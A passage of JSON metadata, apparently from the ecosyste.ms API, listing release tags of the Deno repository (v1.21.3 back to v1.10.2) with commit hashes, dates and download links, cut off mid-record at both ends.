s.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/re